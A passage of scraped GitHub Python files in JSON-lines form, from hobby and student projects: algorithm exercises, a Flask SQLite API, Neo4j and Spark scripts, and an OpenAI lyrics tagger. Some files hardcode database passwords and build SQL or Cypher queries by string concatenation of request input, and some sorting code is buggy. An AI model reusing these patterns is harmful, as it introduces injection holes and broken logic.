dog.'))\n","repo_name":"paolocassina2/file_python2","sub_path":"file_python/operazioni_stringhe/countwords_2_methods.py","file_name":"countwords_2_methods.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41718207114","text":"n, l, d = map(int, input().split())\n\nmusic = [True] * ((n * l) + (5 * (n - 1)))\n\nfor i in range(n):\n play_time = (l + 5) * i\n for j in range(play_time, play_time + l):\n music[j] = False\nanswer = 0\nwhile answer < len(music):\n if music[answer]:\n break\n answer += d\nprint(answer)","repo_name":"hanmingi/Prepare-CodingTest","sub_path":"Baekjoon/Python/1333.py","file_name":"1333.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32008302324","text":"from py2neo import *\r\ngraph = Graph(\"http://localhost:7474\", username=\"neo4j\", password='Chen0225')\r\n\r\nfile1=open(\"yi.txt\", 'r')\r\ns1=file1.read()\r\nfor x in s1:\r\n sss = \"MATCH (a:Char) where a.name='\"+x+\"' set a.sheng = 1\"\r\n graph.run(sss)\r\n\r\nfile2=open(\"er.txt\", 'r')\r\ns2=file2.read()\r\nfor x in s2:\r\n sss = \"MATCH (a:Char) where a.name='\"+x+\"' set a.sheng = 2\"\r\n graph.run(sss)\r\n\r\nfile3=open(\"san.txt\", 'r')\r\ns3=file3.read()\r\nfor x in s3:\r\n sss = \"MATCH (a:Char) where a.name='\"+x+\"' set a.sheng = 3\"\r\n graph.run(sss)\r\n\r\nfile4=open(\"si.txt\", 'r')\r\ns4=file4.read()\r\nfor x in s4:\r\n sss = \"MATCH (a:Char) where a.name='\"+x+\"' set a.sheng = 4\"\r\n graph.run(sss)\r\n","repo_name":"xchennnw/LiShangyin-Poem-Writer","sub_path":"XieShi2019/setsheng.py","file_name":"setsheng.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2428403360","text":"import jax\nfrom jax import random, numpy as jnp\nfrom flax import linen as nn\nfrom trainer.loss.custom import multiple_negatives_ranking_loss\nfrom jax.config import config\n\n# Dummy version\nbatch_size = 20\nembedding_size = 250\n\n\ndef demo_train_step(model, params, input):\n # We can integrate with existing scripts. this is for demo purpose.\n\n def loss(params):\n preds = model.apply(params, input)\n preds = jnp.reshape(preds, (preds.shape[0], -1, embedding_size))\n return multiple_negatives_ranking_loss(preds)\n\n loss, grad = jax.value_and_grad(loss)(params)\n return loss, grad\n\n\ndef main():\n key = random.PRNGKey(0)\n key1, key2 = random.split(key)\n\n dummy_model = nn.Dense(features=3 * embedding_size)\n dummy_input = random.normal(key1, (batch_size, 200))\n params = dummy_model.init(key2, dummy_input)\n\n value, grad = demo_train_step(dummy_model, params, dummy_input)\n print(\"Value : \", value)\n print(\"Grad : \", grad)\n\n\nif __name__ == \"__main__\":\n config.update(\"jax_enable_x64\", True)\n main()\n","repo_name":"nreimers/flax-sentence-embeddings","sub_path":"trainer/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"21"} +{"seq_id":"39659200322","text":"'''\n\nbs_analytical_test.py\n\n28 April 2019\nJeffrey J. Walker\n\nA simple test of the bs_analytical_solver.py function\n\n'''\n\nimport numpy as np\nimport scipy as sp\nimport matplotlib.pyplot as plt\nfrom bs_analytical_solver import bs_analytical_solver\n\nstrike=294.0\nSt=293.41\nrfr=(2.36)/100\ntexp=4/365.0\nsig=(6.3361/100)\notype='p'\n\nsolution,delta,gamma,vega,theta,rho = bs_analytical_solver(\n\tS=St,K=strike,r=rfr,T=texp,sigma=sig,o_type=otype)\n\nprint('Price:'+str(solution))\nprint('Delta:'+str(delta))\nprint('Gamma:'+str(gamma))\nprint('Vega:'+str(vega))\nprint('Theta:'+str(theta))\nprint('Rho:'+str(rho))\n\n","repo_name":"jjwalkerwvu/finance","sub_path":"bs_analytical_test.py","file_name":"bs_analytical_test.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2055854413","text":"# Calcule la moyenne de la classe\nimport numpy as np\n\ngrades = np.array([[10, 12.5, 6], [19, 18.5, 16], [14, 13.5, 17]])\n\ngrades_len = np.shape(grades)\ntotal_students = grades_len[0]\ntotal_grades = grades_len[1]\n\naverages = [] # liste vide pour stoker les moyennes\n\nfor i in range(0, total_students):\n\n sum_grades = 0\n\n for j in range(0, total_grades):\n sum_grades += grades[i, j]\n\n averages.append(sum_grades / total_grades)\n\n# Calcul de la moyenne\n\nsum_student_avg = 0\n\nfor student_avg in averages:\n sum_student_avg += student_avg\n\nclassroom_avg = sum_student_avg / total_students\n\nprint(f\"Moyenne de la classe: {classroom_avg}\")\n","repo_name":"datalyo-dc-m1/tp-python-Sarah-Datalyo","sub_path":"tp1/td2/exercice_8.py","file_name":"exercice_8.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37348579008","text":"import os\nfrom ast import literal_eval\n\nimport spotipy\nfrom spotipy.oauth2 import SpotifyClientCredentials\nfrom lyricsgenius import Genius\n\nimport openai\n\nfrom neo4j import GraphDatabase\n\nopenai.api_key = os.environ[\"OPENAI_API_KEY\"]\n\nusername = os.environ[\"SPOTIFY_USERNAME\"]\ncid = os.environ[\"SPOTIFY_CID\"]\nsecret = os.environ[\"SPOTIFY_SECRET\"]\ntoken = os.environ[\"GENIUS_TOKEN\"]\n\n\nclient_credentials_manager = SpotifyClientCredentials(\n client_id=cid, client_secret=secret\n)\nsp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\n\ngenius = Genius(token)\n\n\ndef get_song_lyrics(g, name):\n search = g.search_song(name)\n\n if search is not None:\n return search.lyrics\n\n\nclass LyricsThemeExtractor:\n def __init__(self):\n self.system_prompt = \"\"\"\"\n Tu es un assistant textuel qui extrait les thèmes en un seul mot correspondants aux paroles d'une chanson mot par mot, les extrayant dans une liste python au format suivant: [\"\", \"\", ...].\n Retourne moi seulement la liste, aucun texte autour sinon c'est invalide.\n Extrait le plus de thèmes possible.\n Essaye de te restreindre aux thèmes suivants: [\"Amitié\", \"Amour\", \"Amusement\", \"Animosité\", \"Argent\", \"Armes\", \"Drogue\", \"Energie\", \"Epreuve\", \"Fantasy\", \"Histoire\", \"Joie\", \"Peine\", \"Religion\", \"Trahison\"] mais tu peux en rajouter si besoin.\n \"\"\"\n\n def get_themes(self, paroles, max_retries=3):\n user_prompt = f'Extrait les themes EN FRANÇAIS SEULEMENT des paroles suivantes en UN SEUL MOT sinon invalide \"{paroles}\"'\n res = None\n retries = 0\n\n while res == None and retries < max_retries:\n try:\n completion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": self.system_prompt},\n {\"role\": \"user\", \"content\": user_prompt},\n ],\n )\n res = literal_eval(completion[\"choices\"][0][\"message\"][\"content\"])\n except:\n retries += 1\n\n return res\n\n\nextractor = LyricsThemeExtractor()\n\ndriver = GraphDatabase.driver(\"bolt://neo4j:7687/\", auth=(\"neo4j\", \"adminadmin\"))\n","repo_name":"ApprocheSemantiqueP2/musicid-docker","sub_path":"streamlit/spotify.py","file_name":"spotify.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7980488043","text":"import random\nnumber = int(random.randint(0,20))\n#print(number)\nvRound = 0\nvCorect = False\nfor i in range(1,7):\n x = int(input(\"pls enter ur number \"))\n if x == number:\n vCorect = True\n print(\"**********************\")\n print(\"congrat! u guess is right.\")\n print(\"end of game\")\n if vCorect == True:\n break\n else :\n if x < number :\n print(\"lower!, try again\")\n vRound = vRound + 1\n if vRound > 5:\n print(\"**********************\")\n print(\"sry! over than 6times\")\n print(\"end of game\")\n else :\n print(\"greater!, try again\")\n vRound = vRound + 1\n if vRound > 5:\n print(\"**********************\")\n print(\"sry! over than 6times\")\n print(\"end of game\")","repo_name":"ArnonGot/lab_python","sub_path":"guessNumber.py","file_name":"guessNumber.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41261237987","text":"#!/usr/bin/python2\n\nf = open('input.txt')\nreport = {}\nfor line in f.readlines():\n for c in line:\n if not(c in [' ', '\\n', '\\r', '\\t']):\n if c in report:\n report[c] += 1\n else:\n report[c] = 1\nf = open('report.txt', 'w')\nf.write(str(report))\nf.close()\n","repo_name":"nonZero/demos-python","sub_path":"src/exercises/basic/char_report/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27792628385","text":"from flask import Flask, jsonify, request, Response, Blueprint\nfrom flask_cors import CORS\n\nimport sqlite3\nimport datetime\n\nTask_Card_bp = Blueprint('Task_Card', __name__)\n\n# enable CORS\nCORS(Task_Card_bp)\n\n# query 範例:\n# http://127.0.0.1:5001/Task_Card?User_ID=xxx\n@Task_Card_bp.route('/Task_Card', methods=['POST', 'PUT', 'DELETE'])\ndef Task_Card():\n # 表示前端送過來的 Query\n User_ID = request.args.get('User_ID')\n\n con = sqlite3.connect(\"./sql/ProjectMgmt.db\")\n cur = con.cursor()\n ret = cur.execute(\"\"\" SELECT * FROM user WHERE User_ID=? \"\"\", (User_ID, ))\n db_result = ret.fetchall()\n con.close()\n\n User_exist = False\n if (len(db_result) != 0):\n User_exist = True\n\n # if User_ID 存在於資料庫\n if (User_exist):\n if request.method == 'POST':\n post_data = request.get_json()\n print(post_data)\n\n Task_Card_ID = post_data.get('Task_Card_ID')\n Task_Card_Name = post_data.get('Task_Card_Name')\n Task_Card_Text = post_data.get('Task_Card_Text')\n Task_Card_StartTime = datetime.date.today()\n Task_Card_EndTime = datetime.date.today()\n Task_Card_Status = True\n Task_List_ID = post_data.get('Task_List_ID')\n\n post_success = False\n\n if(Task_Card_ID and Task_Card_Name and Task_Card_Text and Task_List_ID):\n con = sqlite3.connect(\"./sql/ProjectMgmt.db\")\n cur = con.cursor()\n \n cur.execute(\"\"\"\n INSERT INTO Task_Card VALUES (?, ?, ?, ?, ?, ?, ?)\n \"\"\", (Task_Card_ID, Task_Card_Name, Task_Card_Text, Task_Card_StartTime, Task_Card_EndTime, Task_Card_Status, Task_List_ID))\n\n con.commit()\n\n cur.execute(\"\"\"\n INSERT INTO Task_WorksOn VALUES (?, ?)\n \"\"\", (User_ID, Task_Card_ID))\n\n con.commit()\n \n ret = cur.execute(\"\"\" SELECT * FROM Task_Card WHERE Task_Card_ID=? \"\"\", (Task_Card_ID, ))\n db_result = ret.fetchall()\n\n if (len(db_result) != 0):\n print(\"成功新增任務卡\")\n print(db_result)\n post_success = True\n\n con.close()\n\n # 修改成功\n if(post_success):\n response_object = {\n 'status': 'success',\n 'response': '新增 Task_Card 成功',\n 'method': 'POST',\n 'route': ''\n }\n return jsonify(response_object)\n # 失敗路徑\n else:\n return Response(\n response = \"失敗\",\n status = 400,\n )\n\n elif request.method == 'PUT':\n put_data = request.get_json()\n print(put_data)\n\n Task_Card_ID = put_data.get('Task_Card_ID')\n\n set_str = \"\"\n exe_tuple = ()\n\n for key, value in put_data.items():\n if key != 'Task_Card_ID':\n set_str = set_str + key + \"=?, \"\n exe_tuple = exe_tuple + (value, )\n \n set_str = set_str[:-2]\n exe_str = \"UPDATE Task_Card SET \" + set_str + \"WHERE Task_Card_ID=\" + Task_Card_ID\n \n put_success = False\n con = sqlite3.connect(\"./sql/ProjectMgmt.db\")\n cur = con.cursor()\n cur.execute(exe_str, exe_tuple)\n con.commit()\n con.close()\n put_success = True\n\n if(put_success): \n response_object = {\n 'status': 'success',\n 'response': '修改 Task_Card 成功',\n 'method': 'PUT',\n 'route': ''\n }\n return jsonify(response_object)\n # 失敗路徑\n else:\n return Response(\n response = \"失敗\",\n status = 400,\n )\n\n # http://127.0.0.1:5001/Task_List?User_ID=xxx&Task_Card_ID=xxx\n elif request.method == 'DELETE':\n Task_Card_ID = request.args.get('Task_Card_ID')\n print(Task_Card_ID)\n\n del_success = False\n\n if (Task_Card_ID):\n con = sqlite3.connect(\"./sql/ProjectMgmt.db\")\n cur = con.cursor()\n cur.execute(\"DELETE FROM Task_Card WHERE Task_Card_ID=?\", (Task_Card_ID, ))\n con.commit()\n con.close()\n del_success = True\n\n # 允許刪除\n if(del_success):\n response_object = {\n 'status': 'success',\n 'response': '刪除 Task_Card 成功',\n 'method': 'DELETE',\n 'route': ''\n }\n return jsonify(response_object)\n # 失敗路徑\n else:\n return Response(\n response = \"失敗\",\n status = 400,\n )\n\n else:\n return Response(\n response = \"驗證失敗\",\n status = 400,\n )","repo_name":"ZhiRongDev/ProjectMgmt","sub_path":"server/blueprints/Task_Card.py","file_name":"Task_Card.py","file_ext":"py","file_size_in_byte":5265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19848875465","text":"import sys\n\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.streaming.kafka import KafkaUtils\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import MapType, ArrayType, FloatType, StringType, StructField, StructType\nfrom collections import defaultdict\nfrom pyspark.sql.functions import from_json, col\nimport time\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print(\"Usage: kafka_to_kudu.py \")\n exit(-1)\n\n kuduTableName = \"jira_events\"\n kafkaBrokers, kuduMasters = sys.argv[1:]\n topicSet = [\"jira-event\"]\n\n spark = SparkSession.builder.appName(\"KafkaToKuduPython\").getOrCreate()\n ssc = StreamingContext(spark.sparkContext, 5)\n\n schema = StructType() \\\n .add(\"timestamp\", StringType()) \\\n .add(\"webhookEvent\", StringType()) \\\n .add(\"issue_event_type_name\", StringType()) \\\n .add(\"user\", StructType()\n .add(\"self\", StringType())\n .add(\"accountId\", StringType())\n .add(\"displayName\", StringType())\n .add(\"active\", StringType())\n .add(\"accountType\", StringType())) \\\n .add(\"issue\", StructType()\n .add(\"id\", StringType())\n .add(\"self\", StringType())\n .add(\"key\", StringType())\n .add(\"fields\", MapType(StringType(), StructType()\n .add(\"statuscategorychangedate\", StringType())\n .add(\"issuetype\", MapType(StringType(), StructType()\n .add(\"self\", StringType())\n .add(\"id\", StringType())\n .add(\"description\", StringType())\n .add(\"name\", StringType())\n .add(\"subtask\", StringType())))))\n .add(\"timespent\", StringType())\n .add(\"project\", MapType(StringType(), StructType()\n .add(\"self\", StringType())\n .add(\"id\", StringType())\n .add(\"key\", StringType())\n .add(\"name\", StringType())\n .add(\"projectTypeKey\", StringType())))) \\\n .add(\"fixVersions\", ArrayType(StringType(), True), True) \\\n .add(\"aggregatetimespent\", StringType(), True) \\\n .add(\"resolution\", StringType(), True) \\\n .add(\"resolutiondate\", StringType(), True) \\\n .add(\"created\", StringType())\n\n spark.sparkContext.setLogLevel(\"ERROR\")\n df = spark.readStream.format(\"kafka\").option(\"kafka.bootstrap.servers\", kafkaBrokers).option(\n \"subscribe\", \"jira-event\").option(\"startingOffsets\", \"earliest\").option(\"failOnDataLoss\", \"false\").load()\n\n # query=df.writeStream.outputMode(\"append\").format(\"console\").start()\n # df.show(1)\n df.select('value').show().writeStream \\\n .format(\"console\").outputMode(\"append\").start().awaitTermination()\n\n parsed = df.select(from_json(col(\"value\").cast(\"string\"),\n schema).alias(\"parsed_value\")).writeStream.format(\"console\").outputMode(\"append\").start().awaitTermination()\n\n #result = parsed.writeStream.format(\"console\").outputMode(\"append\").start().awaitTermination()\n parsed.printSchema()\n\n # df.printSchema()\n\n # spark.read.format('org.apache.kudu.spark.kudu').option('kudu.master', kuduMasters)\\\n # .option('kudu.table', kuduTableName).load().registerTempTable(kuduTableName)\n # spark.sql(\"INSERT INTO TABLE {table} from (select uuid(), current_timestamp(), '{payload}')\".format(\n # table=kuduTableName, payload=row.value()))\n\n # query.awaitTermination()\n\n # dstream = KafkaUtils.createDirectStream(\n # ssc, topicSet, {\"metadata.broker.list\": kafkaBrokers})\n # windowedStream = dstream.window(60)\n\n # def debug(x):\n # print(\"{}\".format(x))\n\n # def process(time, rdd):\n # if rdd.isEmpty() == False:\n # collection = rdd.collect()\n # result = list(zip(*collection))[1]\n # a = \"{}\".format(result[0])\n # # print(a)\n # spark.read.json(a).show()\n # # debug(result[0])\n # spark.read.format('org.apache.kudu.spark.kudu').option('kudu.master', kuduMasters)\\\n # .option('kudu.table', kuduTableName).load().registerTempTable(kuduTableName)\n\n # # str = ''.join(collection[0][1])\n\n # # df.show(truncate=False)\n # # df.printSchema()\n # # df.show()\n # spark.sql(\"INSERT INTO TABLE {table} from (select uuid(), current_timestamp(), '{payload}')\".format(\n # table=kuduTableName, payload=result[0]))\n\n # windowedStream.foreachRDD(process)\n\n # ssc.start()\n # ssc.awaitTermination()\n","repo_name":"mandocaesar/jira-event-pipeline","sub_path":"spark-consumer.py","file_name":"spark-consumer.py","file_ext":"py","file_size_in_byte":4996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41713370402","text":"#! /usr/bin/python\nfrom sys import argv\nimport numpy\nimport argparse\nimport matplotlib.pyplot as plt\n\nimport utils\n\ntests = ['hist', 'avg', 'std', 'phase']\n\ndef gen_histogram(vals, filename):\n plt.hist(vals, bins=256, range = (0,255))\n plt.savefig(filename+'_hist.png')\n plt.show()\n\ndef gen_phase_space(vals, filename):\n phase =[[0 for i in range(256)] for j in range(256)]\n for i in range(1, len(vals)):\n phase[vals[i-1]][vals[i]] += 1\n x = []\n y = []\n color = []\n for i in range(256):\n for j in range(256):\n if(phase[i][j] != 0):\n x.append(i)\n y.append(j)\n color.append(phase[i][j])\n plt.scatter(x,y,c=color)\n plt.savefig(filename+'_phase.png')\n plt.show()\n\ndef parse_args(args):\n parser = argparse.ArgumentParser(description='generate a histogram based on the given file')\n parser.add_argument('-f', '--file', help='Name of the file to analyze', required=True)\n parser.add_argument('-t', '--tests', help='Which tests to run.', choices=['all']+tests, nargs='+', required=True)\n return parser.parse_args(args)\n\nargs = parse_args(argv[1:])\nvals = utils.read_file(args.file)\n\nall_t = False\nif 'all' in args.tests:\n args.tests = tests\n\nif 'hist' in args.tests:\n gen_histogram(vals, args.file)\nif 'avg' in args.tests:\n print('average is:', numpy.mean(vals))\nif 'std' in args.tests:\n print('standard deviation is:', numpy.std(vals))\nif 'phase' in args.tests:\n gen_phase_space(vals, args.file)\n","repo_name":"billionai/Chaotic_Cryptography","sub_path":"tests/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40182555875","text":"#Bubble Sort\r\ndef tukar(data1,i,j):\r\n data1[i],data1[j]= data1[j],data1[i]\r\ndef bubblesort(data):\r\n ubah = True\r\n sesi = len(data)\r\n while sesi > 1 and ubah:\r\n ubah = False\r\n j = 1\r\n while j < sesi:\r\n if data[j]x[i+1]:\r\n temp = x[i]\r\n x[i] = x[i+1]\r\n x[i+1] = temp\r\nc =[23,7,32,99,4,14,11,20]\r\nprint(\"===========================================\")\r\nprint(\"Sebelum Bubble Sort\")\r\nprint(c)\r\nprint(\"Setelah Bubbel Sort\")\r\nbubblesort(c)\r\nprint(c)\r\nprint(\"\")\r\n\r\n\r\n#Selection Sort\r\ndef tukar(data3,i,j):\r\n data3[i],data3[j]=data3[j],data3[i]\r\ndef Selection(data):\r\n perubahan = True\r\n sesi = 0\r\n while sesi < len(data)-1 and perubahan:\r\n perubahan = False\r\n dataterendah = sesi\r\n datalanjutan = dataterendah + 1\r\n while datalanjutan < len(data):\r\n if data[dataterendah] > data[datalanjutan]:\r\n dataterendah= datalanjutan\r\n datalanjutan += 1\r\n if datalanjutan != sesi:\r\n tukar(data,dataterendah,sesi)\r\n perubahan = True\r\n print(data)\r\n if not perubahan:\r\n print(\"Hasil Akhir = %s\" %str(data))\r\n sesi += 1\r\nprint(\"===============================================\")\r\nprint(\"Sebelum Selection Sort\")\r\nd = [54,26,13,93,17,77,44,31]\r\nprint(d)\r\nprint(\"Setelah Selection Sort\")\r\nSelection(d)\r\nprint(\"\")\r\n\r\ndef Selectionsort(data4):\r\n for slot in range(len(data4)-1):\r\n position = slot\r\n for location in range(len(data4)-1,slot,-1):\r\n if data4[location]=0 and data5[y] > x:\r\n data5[y + 1 ] = data5[y]\r\n y -= 1\r\n data5[y + 1] = x\r\n index = 0\r\nprint(\"====================================================\")\r\npanjangList = int(input(\"Input Panjang List Yang Diinginkan = \"))\r\ndata5 = []\r\nfor i in range(1, panjangList+1):\r\n angka = int(input(\"Masukkan Angka Yang Ke %i Untuk List = \" %i))\r\n data5.append(angka)\r\nprint(\"Sebelum Di Insertion Sort\")\r\nprint(data5)\r\ninsertionsort(data5)\r\nprint(\"Setelah Di Insertion Sort\")\r\nprint(data5)\r\nprint(\"\")\r\n\r\ndef insertion_sort(data6):\r\n for i in range(1, len (data6)):\r\n x = data6[i]\r\n j = i-1\r\n while j >=0 and x < data6[j] :\r\n data6[j+1] = data6[j]\r\n j -= 1\r\n data6[j+1] = x\r\n\r\ng = [12,11,13,5,6]\r\ninsertion_sort(g)\r\nprint(\"===============================================\")\r\nprint(\"Hasil : \")\r\nfor i in range(len(g)):\r\n print(\"%d\" %g[i])\r\nprint(\"\")\r\n\r\n# Quick Sort\r\ndef quicksort(alist):\r\n quickSortHelper(alist,0,len(alist)-1)\r\n\r\ndef quickSortHelper(alist,first,last):\r\n if first= pivotvalue and rightmark >= leftmark:\r\n rightmark = rightmark - 1\r\n if rightmark < leftmark:\r\n done = True\r\n else:\r\n temp = alist[leftmark]\r\n alist[leftmark] = alist[rightmark]\r\n alist[rightmark] = temp\r\n temp = alist[first]\r\n alist[first] = alist[rightmark]\r\n alist[rightmark] = temp\r\n return rightmark\r\n\r\nalist = [54,26,93,17,77,31,44,55,20]\r\nprint(\"===============================================\")\r\nprint(\"Sebelum Quick Sort\")\r\nprint(alist)\r\nprint(\"Setelah Quick Sort\")\r\nquicksort(alist)\r\nprint(alist)\r\nprint(\"\")\r\n\r\ndef partition(l, bwh, atas):\r\n pivot = l[bwh]\r\n pos_batas = bwh+1\r\n for j in range(bwh+1,atas):\r\n if l[j] < pivot:\r\n l[pos_batas],l[j] = l[j],l[pos_batas]\r\n pos_batas += 1\r\n l[pos_batas-1],l[bwh] = l[bwh],l[pos_batas-1]\r\n return pos_batas\r\n\r\ndef quicksort(l, bwh, atas):\r\n if atas<= bwh:\r\n return\r\n q = partition(l, bwh, atas)\r\n quicksort(l, bwh, q-1)\r\n quicksort(l, q, atas)\r\n return l\r\nangka = [34,21,45,32,12,31,19,23,54,31,25,27]\r\nprint(\"===============================================\")\r\nprint('Sebelum Sort:',angka)\r\nquicksort(angka,0,len(angka))\r\nprint('Setelah Sort:',angka)\r\nprint(\"\")\r\n\r\n# Marge Sort\r\ndef merge_sort(list_bilangan):\r\n jumlah_bilangan = len(list_bilangan)\r\n if jumlah_bilangan > 1:\r\n posisi_tengah = len(list_bilangan)//2\r\n potongan_kiri = list_bilangan[:posisi_tengah]\r\n potongan_kanan = list_bilangan[posisi_tengah:]\r\n\r\n merge_sort(potongan_kiri)\r\n merge_sort(potongan_kanan)\r\n\r\n jumlah_bilangan_kiri = len(potongan_kiri)\r\n jumlah_bilangan_kanan = len(potongan_kanan)\r\n c_all,c_kiri,c_kanan = 0,0,0\r\n print('Sebelum Merge:',list_bilangan)\r\n print('Potongan Sebelum Merge:',potongan_kiri,':',potongan_kanan)\r\n while c_kiri < jumlah_bilangan_kiri or c_kanan < jumlah_bilangan_kanan:\r\n if c_kiri == jumlah_bilangan_kiri:\r\n list_bilangan[c_all] = potongan_kanan[c_kanan]\r\n c_kanan = c_kanan + 1 \r\n elif c_kanan == jumlah_bilangan_kanan:\r\n list_bilangan[c_all] = potongan_kiri[c_kiri]\r\n c_kiri = c_kiri + 1\r\n elif potongan_kiri[c_kiri] >= potongan_kanan[c_kanan]:\r\n list_bilangan[c_all] = potongan_kiri[c_kiri]\r\n c_kiri = c_all + 1\r\n else:\r\n list_bilangan[c_all] = potongan_kanan[c_kanan]\r\n c_kanan = c_kanan + 1\r\n c_all = c_all + 1\r\n print('Setelah Merge:',list_bilangan)\r\n print()\r\n\r\nangka = [6,5,3,1,8,7,2,4]\r\nprint('Sebelum Sort:',angka)\r\nprint(\"\")\r\nmerge_sort(angka)\r\nprint('Setelah Sort:',angka)\r\nprint(\"\")\r\n\r\n# Radix Sort\r\ndef countingSort(arr, exp1):\r\n n = len(arr)\r\n output = [0] * (n)\r\n count = [0] * (10)\r\n\r\n for i in range(0, n):\r\n index = (arr[i] / exp1)\r\n count[int(index % 10)] += 1\r\n\r\n for i in range(1, 10):\r\n count[i] += count[i - 1]\r\n \r\n i = n - 1\r\n while i>=0:\r\n index = (arr[i] / exp1)\r\n output[count[int(index % 10)]-1] = arr[i]\r\n count[int(index % 10)] -=1\r\n i -= 1\r\n\r\n i=0\r\n for i in range(0, len(arr)):\r\n arr[i]= output[i]\r\n\r\ndef radixSort(arr):\r\n max1 = max(arr)\r\n exp = 1\r\n while max1 / exp > 0:\r\n countingSort(arr, exp)\r\n exp *= 10\r\narr = [170,45,75,90,802,24,2,66]\r\nradixSort(arr)\r\nfor i in range(len(arr)):\r\n print(arr[i])\r\nprint(\"\")\r\n \r\n# Sequential Search\r\nData = [10,4,2,3,7,1,6,8]\r\ncaridata = int(input(\"Masukkan Nilai Yang Dicari:\"))\r\nditemukan = False\r\nfor i in range(0, len(Data)):\r\n print(Data[i])\r\n if Data[i] == caridata:\r\n ditemukan = True\r\n break\r\nif ditemukan:\r\n print(\"Data Ditemukan!!\")\r\nelse:\r\n print(\"Data Tidak Ditemukan!!\")\r\nprint(\"\")\r\n\r\n# Linear Search\r\ndef linearSearch(Data,list):\r\n ditemukan = False\r\n posisi = 0\r\n while posisi < len(list) and not ditemukan:\r\n if list[posisi] == Data:\r\n ditemukan = True\r\n posisi = posisi + 1\r\n return ditemukan\r\ntas = ['Buku','Pensil','Pulpen','Note Book','Laptop','Handphone']\r\nData = input(\"Apa Yang Ingin Kamu Cari Didalam Tas ?\")\r\ntemukanitem = linearSearch(Data,tas)\r\nif temukanitem:\r\n print(\"Ya, Benda Tersebut Berada Didalam Tas\")\r\nelse:\r\n print(\"Oops, Benda Tersebut Tidak Berada Didalam Tas\")\r\nprint(\"\")\r\n\r\n# Linear Search Dengan Sentinel\r\nData= [114,110,77,112,65,80,80,90,113,109,110,89,108,85,87,65,90,95,100]\r\ncaridata = 109\r\njumlah = len(Data)\r\nData.append(caridata)\r\nindex = 0\r\nwhile Data[index] != caridata:\r\n index+=1\r\n\r\nif index < jumlah:\r\n print('Nilai',caridata,'Ditemukan Pada Index',index)\r\nelse:\r\n print('Nilai',caridata,'Tidak Ditemukan')\r\nprint(\"\")\r\n\r\n# Binary Search\r\nData = [1,3,4,6,7,8,10,13,14,18,19,21,24,3,7,40,45,71]\r\ncaridata= 7\r\nprint('Mencari Nilai',caridata,'Dengan Binary Search','Pada List',Data)\r\nditemukan = False\r\nbatas_awal = 0\r\nbatas_akhir = len(Data) - 1\r\nwhile not ditemukan and batas_awal <= batas_akhir:\r\n pos_cari = batas_awal + (batas_akhir-batas_awal)//2\r\n print('Posisi Pencarian: index', pos_cari,'Dengan Nilai',Data[pos_cari])\r\n if Data[pos_cari] == caridata:\r\n ditemukan = True\r\n elif Data[pos_cari] > caridata:\r\n batas_akhir = pos_cari-1\r\n else:\r\n batas_awal = pos_cari+1\r\n\r\nif ditemukan:\r\n print('Nilai',caridata,'Ditemukan Pada Index',pos_cari)\r\nelse:\r\n print('Nilai',caridata,'Tidak Ditemukan')\r\n\r\ndef binarySearch(data, posisi, x, cari):\r\n if x >= posisi:\r\n mid = posisi + (x - posisi) // 2\r\n if data[mid] == cari:\r\n return mid\r\n \r\n elif data[mid] > cari:\r\n return binarySearch(data, posisi, mid-1, cari)\r\n\r\n else:\r\n return binarySearch(data, mid+1, x, cari)\r\n else:\r\n return -1\r\n\r\ndata =[2,3,4,10,40]\r\ncari = int(input(\"Masukkan Data Yang Akan Dicari=\"))\r\nresult = binarySearch(data,0,len(data)-1,cari)\r\nif result != -1:\r\n print(\"Data Ditemukan!\")\r\nelse:\r\n print(\"Data Tidak Ditemukan!\")\r\nprint(\"\")\r\n\r\n#InterpolationSearch\r\ndef interpolationSearch(arr, bwh, atas, x):\r\n if (bwh <= atas and x >= arr[bwh] and x <= arr[atas]):\r\n pos = bwh + ((atas - bwh) // (arr[atas] - arr[bwh]) *\r\n (x - arr[bwh]))\r\n \r\n if arr[pos] == x:\r\n return pos\r\n\r\n if arr[pos] < x:\r\n return interpolationSearch(arr, pos + 1,\r\n atas, x)\r\n if arr[pos] > x:\r\n return interpolationSearch(arr, bwh,\r\n pos - 1, x)\r\n return -1\r\n\r\narr = [10, 12, 13, 16, 18, 19, 20,\r\n 21, 22, 23, 24, 33, 35, 42, 47]\r\nn = len(arr)\r\n\r\nx = 18\r\nindex = interpolationSearch(arr, 0, n - 1, x)\r\n \r\nif index != -1:\r\n print(\"Data Ditemukan Pada Index\", index)\r\nelse:\r\n print(\"Data Tidak Ditemukan\")","repo_name":"Shandika14/Kuliah-UTY","sub_path":"Python/Semester - 1/Tugas Bubblesort.py","file_name":"Tugas 